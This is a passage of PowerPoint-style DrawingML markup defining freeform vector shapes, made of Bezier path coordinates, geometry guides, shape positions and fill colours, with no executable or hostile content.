                    <a:gd name="T43" fmla="*/ 54 h 215"/>
                    <a:gd name="T44" fmla="*/ 43 w 177"/>
                    <a:gd name="T45" fmla="*/ 56 h 2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77" h="215">
                      <a:moveTo>
                        <a:pt x="172" y="191"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="167" y="171"/>
                        <a:pt x="154" y="62"/>
                        <a:pt x="151" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="27"/>
                        <a:pt x="133" y="22"/>
                        <a:pt x="125" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="117" y="16"/>
                        <a:pt x="104" y="13"/>
                        <a:pt x="91" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="7"/>
                        <a:pt x="70" y="4"/>
                        <a:pt x="61" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="0"/>
                        <a:pt x="34" y="4"/>
                        <a:pt x="31" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="17"/>
                        <a:pt x="9" y="136"/>
                        <a:pt x="4" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="175"/>
                        <a:pt x="22" y="180"/>
                        <a:pt x="26" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="158"/>
                        <a:pt x="37" y="103"/>
                        <a:pt x="41" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="75"/>
                        <a:pt x="44" y="81"/>
                        <a:pt x="49" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="100"/>
                        <a:pt x="54" y="119"/>
                        <a:pt x="48" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="155"/>
                        <a:pt x="52" y="160"/>
                        <a:pt x="58" y="161"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="164"/>
                        <a:pt x="95" y="171"/>
                        <a:pt x="102" y="172"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="174"/>
                        <a:pt x="129" y="161"/>
                        <a:pt x="125" y="153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="114" y="132"/>
                        <a:pt x="125" y="78"/>
                        <a:pt x="127" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="127" y="67"/>
                        <a:pt x="128" y="79"/>
                        <a:pt x="129" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="132" y="107"/>
                        <a:pt x="140" y="147"/>
                        <a:pt x="150" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="215"/>
                        <a:pt x="177" y="214"/>
                        <a:pt x="172" y="191"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="43" y="56"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="42"/>
                        <a:pt x="45" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="48"/>
                        <a:pt x="44" y="51"/>
                        <a:pt x="44" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="54"/>
                        <a:pt x="44" y="54"/>
                        <a:pt x="44" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="55"/>
                        <a:pt x="44" y="55"/>
                        <a:pt x="43" y="56"/>
                      </a:cubicBezTo>
                      <a:close/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37" name="Freeform 989">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FA83164-8CF2-49C2-B5F2-CA85EBAF7FD6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3685" y="3696"/>
                  <a:ext cx="322" cy="411"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 130 w 136"/>
                    <a:gd name="T1" fmla="*/ 44 h 174"/>
                    <a:gd name="T2" fmla="*/ 104 w 136"/>
                    <a:gd name="T3" fmla="*/ 19 h 174"/>
                    <a:gd name="T4" fmla="*/ 70 w 136"/>
                    <a:gd name="T5" fmla="*/ 10 h 174"/>
                    <a:gd name="T6" fmla="*/ 40 w 136"/>
                    <a:gd name="T7" fmla="*/ 2 h 174"/>
                    <a:gd name="T8" fmla="*/ 10 w 136"/>
                    <a:gd name="T9" fmla="*/ 12 h 174"/>
                    <a:gd name="T10" fmla="*/ 0 w 136"/>
                    <a:gd name="T11" fmla="*/ 69 h 174"/>
                    <a:gd name="T12" fmla="*/ 19 w 136"/>
                    <a:gd name="T13" fmla="*/ 76 h 174"/>
                    <a:gd name="T14" fmla="*/ 20 w 136"/>
                    <a:gd name="T15" fmla="*/ 70 h 174"/>
                    <a:gd name="T16" fmla="*/ 28 w 136"/>
                    <a:gd name="T17" fmla="*/ 85 h 174"/>
                    <a:gd name="T18" fmla="*/ 27 w 136"/>
                    <a:gd name="T19" fmla="*/ 150 h 174"/>
                    <a:gd name="T20" fmla="*/ 37 w 136"/>
                    <a:gd name="T21" fmla="*/ 161 h 174"/>
                    <a:gd name="T22" fmla="*/ 81 w 136"/>
                    <a:gd name="T23" fmla="*/ 172 h 174"/>
                    <a:gd name="T24" fmla="*/ 104 w 136"/>
                    <a:gd name="T25" fmla="*/ 153 h 174"/>
                    <a:gd name="T26" fmla="*/ 106 w 136"/>
                    <a:gd name="T27" fmla="*/ 67 h 174"/>
                    <a:gd name="T28" fmla="*/ 108 w 136"/>
                    <a:gd name="T29" fmla="*/ 85 h 174"/>
                    <a:gd name="T30" fmla="*/ 109 w 136"/>
                    <a:gd name="T31" fmla="*/ 93 h 174"/>
                    <a:gd name="T32" fmla="*/ 136 w 136"/>
                    <a:gd name="T33" fmla="*/ 89 h 174"/>
                    <a:gd name="T34" fmla="*/ 130 w 136"/>
                    <a:gd name="T35" fmla="*/ 44 h 174"/>
                    <a:gd name="T36" fmla="*/ 22 w 136"/>
                    <a:gd name="T37" fmla="*/ 56 h 174"/>
                    <a:gd name="T38" fmla="*/ 24 w 136"/>
                    <a:gd name="T39" fmla="*/ 44 h 174"/>
                    <a:gd name="T40" fmla="*/ 23 w 136"/>
                    <a:gd name="T41" fmla="*/ 55 h 174"/>
                    <a:gd name="T42" fmla="*/ 23 w 136"/>
                    <a:gd name="T43" fmla="*/ 54 h 174"/>
                    <a:gd name="T44" fmla="*/ 22 w 136"/>
                    <a:gd name="T45" fmla="*/ 56 h 1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36" h="174">
                      <a:moveTo>
                        <a:pt x="130" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="127" y="27"/>
                        <a:pt x="112" y="22"/>
                        <a:pt x="104" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="96" y="16"/>
                        <a:pt x="83" y="13"/>
                        <a:pt x="70" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="7"/>
                        <a:pt x="49" y="4"/>
                        <a:pt x="40" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="0"/>
                        <a:pt x="13" y="4"/>
                        <a:pt x="10" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="5" y="40"/>
                        <a:pt x="0" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="73"/>
                        <a:pt x="14" y="79"/>
                        <a:pt x="19" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="74"/>
                        <a:pt x="20" y="72"/>
                        <a:pt x="20" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="75"/>
                        <a:pt x="23" y="81"/>
                        <a:pt x="28" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="100"/>
                        <a:pt x="33" y="119"/>
                        <a:pt x="27" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="155"/>
                        <a:pt x="31" y="160"/>
                        <a:pt x="37" y="161"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="164"/>
                        <a:pt x="74" y="171"/>
                        <a:pt x="81" y="172"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="174"/>
                        <a:pt x="108" y="161"/>
                        <a:pt x="104" y="153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="93" y="132"/>
                        <a:pt x="104" y="78"/>
                        <a:pt x="106" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="67"/>
                        <a:pt x="107" y="79"/>
                        <a:pt x="108" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="87"/>
                        <a:pt x="109" y="90"/>
                        <a:pt x="109" y="93"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="115" y="96"/>
                        <a:pt x="132" y="93"/>
                        <a:pt x="136" y="89"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="133" y="68"/>
                        <a:pt x="131" y="50"/>
                        <a:pt x="130" y="44"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="22" y="56"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="47"/>
                        <a:pt x="24" y="42"/>
                        <a:pt x="24" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="48"/>
                        <a:pt x="23" y="51"/>
                        <a:pt x="23" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="54"/>
                        <a:pt x="23" y="54"/>
                        <a:pt x="23" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="55"/>
                        <a:pt x="23" y="55"/>
                        <a:pt x="22" y="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38" name="Freeform 990">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1187D026-6720-46A2-9084-E29C5A906F6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3576" y="3729"/>
                  <a:ext cx="113" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 7 w 48"/>
                    <a:gd name="T1" fmla="*/ 49 h 49"/>
                    <a:gd name="T2" fmla="*/ 0 w 48"/>
                    <a:gd name="T3" fmla="*/ 48 h 49"/>
                    <a:gd name="T4" fmla="*/ 43 w 48"/>
                    <a:gd name="T5" fmla="*/ 0 h 49"/>
                    <a:gd name="T6" fmla="*/ 48 w 48"/>
                    <a:gd name="T7" fmla="*/ 6 h 49"/>
                    <a:gd name="T8" fmla="*/ 7 w 48"/>
                    <a:gd name="T9" fmla="*/ 49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9">
                      <a:moveTo>
                        <a:pt x="7" y="49"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="48"/>
                        <a:pt x="0" y="48"/>
                        <a:pt x="0" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="35"/>
                        <a:pt x="36" y="6"/>
                        <a:pt x="43" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="6"/>
                        <a:pt x="48" y="6"/>
                        <a:pt x="48" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="20"/>
                        <a:pt x="9" y="42"/>
                        <a:pt x="7" y="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39" name="Freeform 991">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36C1FABF-FC14-411B-A47A-A4B50E21D84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3586" y="3710"/>
                  <a:ext cx="26" cy="137"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 26"/>
                    <a:gd name="T1" fmla="*/ 137 h 137"/>
                    <a:gd name="T2" fmla="*/ 0 w 26"/>
                    <a:gd name="T3" fmla="*/ 2 h 137"/>
                    <a:gd name="T4" fmla="*/ 19 w 26"/>
                    <a:gd name="T5" fmla="*/ 0 h 137"/>
                    <a:gd name="T6" fmla="*/ 19 w 26"/>
                    <a:gd name="T7" fmla="*/ 12 h 137"/>
                    <a:gd name="T8" fmla="*/ 26 w 26"/>
                    <a:gd name="T9" fmla="*/ 137 h 137"/>
                    <a:gd name="T10" fmla="*/ 8 w 26"/>
                    <a:gd name="T11" fmla="*/ 137 h 137"/>
                    <a:gd name="T12" fmla="*/ 8 w 26"/>
                    <a:gd name="T13" fmla="*/ 137 h 1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6" h="137">
                      <a:moveTo>
                        <a:pt x="8" y="137"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="13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40" name="Freeform 992">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{107012FB-E640-4A1C-A5F4-292A110FE9D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3590" y="3670"/>
                  <a:ext cx="137" cy="85"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 26 w 58"/>
                    <a:gd name="T1" fmla="*/ 34 h 36"/>
                    <a:gd name="T2" fmla="*/ 9 w 58"/>
                    <a:gd name="T3" fmla="*/ 20 h 36"/>
                    <a:gd name="T4" fmla="*/ 14 w 58"/>
                    <a:gd name="T5" fmla="*/ 11 h 36"/>
                    <a:gd name="T6" fmla="*/ 47 w 58"/>
                    <a:gd name="T7" fmla="*/ 14 h 36"/>
                    <a:gd name="T8" fmla="*/ 50 w 58"/>
                    <a:gd name="T9" fmla="*/ 26 h 36"/>
                    <a:gd name="T10" fmla="*/ 26 w 58"/>
                    <a:gd name="T11" fmla="*/ 34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8" h="36">
                      <a:moveTo>
                        <a:pt x="26" y="34"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="33"/>
                        <a:pt x="0" y="22"/>
                        <a:pt x="9" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="19"/>
                        <a:pt x="12" y="14"/>
                        <a:pt x="14" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="9"/>
                        <a:pt x="47" y="0"/>
                        <a:pt x="47" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="19"/>
                        <a:pt x="42" y="22"/>
                        <a:pt x="50" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="29"/>
                        <a:pt x="40" y="36"/>
                        <a:pt x="26" y="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41" name="Freeform 993">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B77F7991-30F6-4F07-BE00-804346684EE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3614" y="3556"/>
                  <a:ext cx="175" cy="173"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 36 w 74"/>
                    <a:gd name="T1" fmla="*/ 1 h 73"/>
                    <a:gd name="T2" fmla="*/ 1 w 74"/>
                    <a:gd name="T3" fmla="*/ 38 h 73"/>
                    <a:gd name="T4" fmla="*/ 39 w 74"/>
                    <a:gd name="T5" fmla="*/ 72 h 73"/>
                    <a:gd name="T6" fmla="*/ 73 w 74"/>
                    <a:gd name="T7" fmla="*/ 35 h 73"/>
                    <a:gd name="T8" fmla="*/ 36 w 74"/>
                    <a:gd name="T9" fmla="*/ 1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4" h="73">
                      <a:moveTo>
                        <a:pt x="36" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="2"/>
                        <a:pt x="0" y="18"/>
                        <a:pt x="1" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="57"/>
                        <a:pt x="19" y="73"/>
                        <a:pt x="39" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="71"/>
                        <a:pt x="74" y="54"/>
                        <a:pt x="73" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="15"/>
                        <a:pt x="55" y="0"/>
                        <a:pt x="36" y="1"/>
                      </a:cubicBezTo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42" name="Freeform 994">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1817B266-A26C-4F2B-BB24-1982AA5B951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3614" y="3556"/>
                  <a:ext cx="175" cy="173"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 36 w 74"/>
                    <a:gd name="T1" fmla="*/ 1 h 73"/>
                    <a:gd name="T2" fmla="*/ 1 w 74"/>
                    <a:gd name="T3" fmla="*/ 38 h 73"/>
                    <a:gd name="T4" fmla="*/ 39 w 74"/>
                    <a:gd name="T5" fmla="*/ 72 h 73"/>
                    <a:gd name="T6" fmla="*/ 73 w 74"/>
                    <a:gd name="T7" fmla="*/ 35 h 73"/>
                    <a:gd name="T8" fmla="*/ 36 w 74"/>
                    <a:gd name="T9" fmla="*/ 1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4" h="73">
                      <a:moveTo>
                        <a:pt x="36" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="2"/>
                        <a:pt x="0" y="18"/>
                        <a:pt x="1" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="57"/>
                        <a:pt x="19" y="73"/>
                        <a:pt x="39" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="71"/>
                        <a:pt x="74" y="54"/>
                        <a:pt x="73" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="15"/>
                        <a:pt x="55" y="0"/>
                        <a:pt x="36" y="1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43" name="Freeform 995">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF48D339-B9FB-49DA-960F-B6C80D6287C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3647" y="3823"/>
                  <a:ext cx="47" cy="83"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 7 w 20"/>
                    <a:gd name="T1" fmla="*/ 0 h 35"/>
                    <a:gd name="T2" fmla="*/ 20 w 20"/>
                    <a:gd name="T3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20" h="35">
                      <a:moveTo>
                        <a:pt x="7" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="0" y="29"/>
                        <a:pt x="20" y="35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44" name="Freeform 996">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E91D880A-CF62-4E4C-B360-962DCAF08C5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3647" y="3823"/>
                  <a:ext cx="47" cy="83"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 7 w 20"/>
                    <a:gd name="T1" fmla="*/ 0 h 35"/>
                    <a:gd name="T2" fmla="*/ 20 w 20"/>
                    <a:gd name="T3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20" h="35">
                      <a:moveTo>
                        <a:pt x="7" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="0" y="29"/>
                        <a:pt x="20" y="35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45" name="Freeform 997">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{695A1C5E-7649-4C3D-8E61-D761F92A895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3552" y="3847"/>
                  <a:ext cx="44" cy="85"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 7 w 19"/>
                    <a:gd name="T1" fmla="*/ 0 h 36"/>
                    <a:gd name="T2" fmla="*/ 19 w 19"/>
                    <a:gd name="T3" fmla="*/ 3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19" h="36">
                      <a:moveTo>
                        <a:pt x="7" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="9"/>
                        <a:pt x="0" y="30"/>
                        <a:pt x="19" y="36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46" name="Freeform 998">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4759F353-BB1F-48AE-ADD2-8EC46D5AD91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3638" y="3542"/>
                  <a:ext cx="244" cy="206"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 88 w 103"/>
                    <a:gd name="T1" fmla="*/ 61 h 87"/>
                    <a:gd name="T2" fmla="*/ 58 w 103"/>
                    <a:gd name="T3" fmla="*/ 7 h 87"/>
                    <a:gd name="T4" fmla="*/ 9 w 103"/>
                    <a:gd name="T5" fmla="*/ 40 h 87"/>
                    <a:gd name="T6" fmla="*/ 9 w 103"/>
                    <a:gd name="T7" fmla="*/ 40 h 87"/>
                    <a:gd name="T8" fmla="*/ 0 w 103"/>
                    <a:gd name="T9" fmla="*/ 59 h 87"/>
                    <a:gd name="T10" fmla="*/ 17 w 103"/>
                    <a:gd name="T11" fmla="*/ 61 h 87"/>
                    <a:gd name="T12" fmla="*/ 12 w 103"/>
                    <a:gd name="T13" fmla="*/ 39 h 87"/>
                    <a:gd name="T14" fmla="*/ 30 w 103"/>
                    <a:gd name="T15" fmla="*/ 26 h 87"/>
                    <a:gd name="T16" fmla="*/ 57 w 103"/>
                    <a:gd name="T17" fmla="*/ 58 h 87"/>
                    <a:gd name="T18" fmla="*/ 92 w 103"/>
                    <a:gd name="T19" fmla="*/ 76 h 87"/>
                    <a:gd name="T20" fmla="*/ 88 w 103"/>
                    <a:gd name="T21" fmla="*/ 61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3" h="87">
                      <a:moveTo>
                        <a:pt x="88" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="34"/>
                        <a:pt x="82" y="13"/>
                        <a:pt x="58" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="0"/>
                        <a:pt x="8" y="13"/>
                        <a:pt x="9" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="40"/>
                        <a:pt x="9" y="40"/>
                        <a:pt x="9" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="45"/>
                        <a:pt x="9" y="62"/>
                        <a:pt x="0" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="24" y="69"/>
                        <a:pt x="17" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="58"/>
                        <a:pt x="10" y="45"/>
                        <a:pt x="12" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="29"/>
                        <a:pt x="20" y="26"/>
                        <a:pt x="30" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="26"/>
                        <a:pt x="68" y="39"/>
                        <a:pt x="57" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="78"/>
                        <a:pt x="80" y="87"/>
                        <a:pt x="92" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="65"/>
                        <a:pt x="88" y="71"/>
                        <a:pt x="88" y="61"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="99663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230" name="Freeform 978">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5ECD362-B5ED-4506-8F44-39A3CFBAF5D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65" y="1838"/>
                <a:ext cx="253" cy="200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 899"/>
                  <a:gd name="T1" fmla="*/ 241 h 708"/>
                  <a:gd name="T2" fmla="*/ 0 w 899"/>
                  <a:gd name="T3" fmla="*/ 708 h 708"/>
                  <a:gd name="T4" fmla="*/ 899 w 899"/>
                  <a:gd name="T5" fmla="*/ 467 h 708"/>
                  <a:gd name="T6" fmla="*/ 899 w 899"/>
                  <a:gd name="T7" fmla="*/ 0 h 708"/>
                  <a:gd name="T8" fmla="*/ 0 w 899"/>
                  <a:gd name="T9" fmla="*/ 241 h 7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99" h="708">
                    <a:moveTo>
                      <a:pt x="0" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="241"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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31" name="Freeform 980">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DC5D15B-CCBF-4E28-8DCD-6849C4344A3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92" y="1803"/>
                <a:ext cx="326" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 707 w 1155"/>
                  <a:gd name="T1" fmla="*/ 0 h 364"/>
                  <a:gd name="T2" fmla="*/ 452 w 1155"/>
                  <a:gd name="T3" fmla="*/ 68 h 364"/>
                  <a:gd name="T4" fmla="*/ 645 w 1155"/>
                  <a:gd name="T5" fmla="*/ 123 h 364"/>
                  <a:gd name="T6" fmla="*/ 0 w 1155"/>
                  <a:gd name="T7" fmla="*/ 295 h 364"/>
                  <a:gd name="T8" fmla="*/ 256 w 1155"/>
                  <a:gd name="T9" fmla="*/ 364 h 364"/>
                  <a:gd name="T10" fmla="*/ 1155 w 1155"/>
                  <a:gd name="T11" fmla="*/ 123 h 364"/>
                  <a:gd name="T12" fmla="*/ 707 w 1155"/>
                  <a:gd name="T13" fmla="*/ 0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55" h="364">
                    <a:moveTo>
                      <a:pt x="707" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="777777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32" name="Freeform 983">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E19F8D68-C937-479B-84B9-4D741609FA6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83" y="1853"/>
                <a:ext cx="382" cy="87"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1157 w 1354"/>
                  <a:gd name="T1" fmla="*/ 240 h 309"/>
                  <a:gd name="T2" fmla="*/ 1354 w 1354"/>
                  <a:gd name="T3" fmla="*/ 189 h 309"/>
                  <a:gd name="T4" fmla="*/ 1098 w 1354"/>
                  <a:gd name="T5" fmla="*/ 120 h 309"/>
